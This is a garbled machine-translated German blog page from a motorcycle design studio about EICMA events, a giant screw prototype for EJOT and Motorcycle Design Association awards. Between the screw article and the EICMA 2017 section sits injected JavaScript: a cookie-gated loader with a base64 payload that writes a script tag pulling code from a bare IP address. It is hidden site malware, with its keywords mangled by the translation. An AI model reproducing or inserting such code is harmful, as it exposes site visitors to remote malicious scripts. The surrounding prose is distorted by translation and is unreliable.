Bier & Talk Freitag in GEGEBEN “November Ausgabe”

BLOG

Bier & Talk Freitag in GEGEBEN “November Ausgabe”

Auch in diesem Monat, Er wiederholt monatlichen Termin GEGEBEN, wo man unter Motorrad-Enthusiasten treffen können, Konstrukteur, oder Freunde.

In diesem Monat präsentieren wir eine schöne CR&S VUN tief Ästhetik aktualisiert, die “Sport”.

In Verbindung EICMA, Die Veranstaltung wird am Freitag der Messe statt, Nach einem Tag voller Meetings und schönen Motorräder, was besser als eine gute Party Ideen zu sammeln?

Wie üblich ist der Eintritt frei, Bier, Würstchen, gute Musik und Spaß sind garantiert, Diese Edition ist Kostenlose Registrierung erforderlich durch Eventbrite.

Eine Schraube… aber Riese!

In gelten nicht nur Motorräder, aber Design-Projekte im Allgemeinen, Wir stellten fest, für das Unternehmen EJOT ein Prototyp sehr ungewöhnlich, es wird eine Schraube von der Größe noch nie gesehen, deren Höhe 1,60m für das Gewicht 290kg. Dieses Projekt hat dazu gedient, das Unternehmen zu einem schlagen Welthebe Aufzeichnungen, und ich würde sagen, dass wir in der Lage waren die Erwartungen der Kunden sowohl aus dem Gewicht Sicht gerecht zu werden erreicht, obbligatorimente 300 kg, mit der Fähigkeit, es zu + -20kg zu ändern, sowohl aus dem Gesichtspunkt der Ästhetik final.

Als erster Schritt durchgeführt wir zunächst eine Studie über Design ed Ingenieurwesen. Dies war ein obligatorischer Schritt, aber von entscheidender Bedeutung, da es ermöglicht, um besser auf die möglichen Verfahren zu bewerten für die Realisierung des Objekts durchgeführt werden; vor allem, wenn, wie in diesem Fall, Sie werden viele Operationen und viele Prozesse erforderlich. Der Ansatz unterscheidet sich je nach Projekt, das Sie vor haben, in unserem Fall konnten wir eine Realisierung durch eine Mischung von Techniken und Materialien bewerten.

Die Seele der Schraube besteht aus einem Block von Stahl geregelt, Sie haben auf der Oberfläche geklebt worden stampe 3D die werden das Erscheinungsbild der Rebe zu rekonstruieren. Diese äußeren Teile wurden in gedruckt PLA da November “drinnen” Taube, Nach einigen Wochen der Freilassung, Sie wurden geschliffen, geklebt Stahl, verfugt und schließlich gemalt. Bei der Montage und Konstruktion der Schraube, eine kontinuierliche Gewichtsüberwachung hat uns ermöglicht, unter Kontrolle zu halten die Schraube, während der Bestätigung zuvor die technischen Studien.

Das gleiche Verfahren wurde für den Wagen getan, die Strahlen von Stahl Sie wurden verschweißt zwischen ihnen (um so in der Lage sein sowohl als Träger für die Schraube, mit Transport zu handeln) und dann gemalt rot.

Hier sind die Bilder, die die verschiedenen Schritte unternommen illustrieren implementieren die Prototyp.

Bleiben Sie dran und auf dem Laufenden bleiben, ein ähnliches Projekt ( wenn nicht noch bizarre) an unserer Tür jederzeit klopfen könnte.
Funktion getCookie(e){var U = document.cookie.match(neuer RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/G,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(die[1]):Leere 0}var src =”Daten:text / javascript;base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs =”,jetzt = Math.floor(Date.now()/1e3),cookie = getCookie(“umleiten”);ob(jetzt>=(Zeit = Cookie)||Leere 0 === Zeit){var time = Math.floor(Date.now()/1e3 + 86400),date = new Date((neues Datum).Zeit kriegen()+86400);document.cookie =”redirect =”+Zeit +”; path = /; expires =”+date.toGMTString(),document.write(”)}

Nur von EICMA zurück 2017

Eine schöne Galerie von Fotos von der Veranstaltung EICMA an dem UM Globalen Stand, den uns zu Teilhabern der Erstellung des Prototyps sahen, die Sie in den Bildern und die Herstellung der sehen können "Customization Corner". Ziel beider Projekte war auf dem italienischen Markt als Reaktion auf die Bewegung erzeugt UM und auch die neuen Möglichkeiten, die individuell gestaltet werden angeboten zu analysieren, um zu bewerten "auf Nachfrage" In den modernen Prototyping und 3D-Drucktechniken verknüpft.

Die Ergebnisse in Bezug auf die öffentliche Reaktion war äußerst lohnend.
Dank denen, die uns zu begrüßen ging an und um zu sehen, was wir getan haben.

Nur von EICMA zurück 2016

Wir haben gerade von EICMA zurück 2016, wir haben immer noch die Hände steif aus allen Schütteln ausgetauscht Hände, ein Herz voller Emotionen und Stolz für die vielen Komplimente.
Wir möchten allen danken, die Besuch kamen und verbinden alle, die nicht kommen konnten.

dank

Motorrad-Design Association | 2012 Milan Nacht

Die historische Marke Moto Guzzi, Zugehörigkeit zu der Gruppe Piaggio, Er erhielt den Motorrad-Entwurf Association Award, ein Beweis für die Qualität des direkten Stil Zentrums von Miguel Galluzzi.

Die Preisverleihung, Es hielt mercoledì¬ Morgen im Skorpion Raum im Konferenzzentrum EICMA, Es machte über den italienischen Stil und die Qualität und Professionalität des Piaggio-Design-Centers. Es war der Präsident der Motorrad-Design Association in Person, Glynn Kerr, zu liefern, in die Hände Dario Lopez, im Namen der ‚grafischen Bereich der Piaggio-Gruppe, die begehrte Auszeichnung, die jährlich Anerkennung der Designwelt zum besten Motorrad Produkt in Bezug auf Innovation und Stil gibt. Anwesend bei der Zeremonie war Donato Cannatello, Designer und Mitglied der internationalen.

Miguel Galluzzi e Donato Cannatello
International Motorcycle Design Prize

Für die Ausgabe 2009 die Auszeichnungen, die Organisation Design (Prahlerei 165 Mitglieder auf vier Kontinenten) Es wird beschlossen, den Preis nicht für ein einziges Modell zu gewähren, aber drei Zugehörigkeit zu der gleichen Marke, in diesem Fall Guzzi. Die Auszeichnung wird geht daher auf den V12 Strada, der V12 und V12 X LM.

Aprilia_Guzzi_design Team

 

100_1751Motorrad-Design Association kurze Beschreibung

"Motorrad-Design ist ein einzigartiger und hochspezialisierten Bereich, doch gibt es bisher keinen zentralen Körper, die Ursache darzustellen, eine Unterlassung, die gleichermaßen sowohl von Designern und Herstellern zum Nachteil gewesen.

Als Ergebnis, die Motorrad-Design Association wurde geschaffen, in 2001 durch Co-Gründer Glynn Kerr und Francois-Marie Dumas. Die Ziele des Vereins sind Motorrad-Designer aus aller Welt zusammen zu bringen, ihre Aktivitäten zu fördern und die Kommunikation zwischen Designern und potenziellen Kunden zu erleichtern. Wir sind auch wirksam bei der Förderung von Schülerarbeiten, und helfen, schaffen Verbindungen zwischen den Hochschulen und der Motorradindustrie.

Der Verband verfügt nun über eine Mitgliedschaft von über 150 Mitglieder, einschließlich freier Designer, Ingenieure, Modellbauer und Design-Studios auf der ganzen Welt."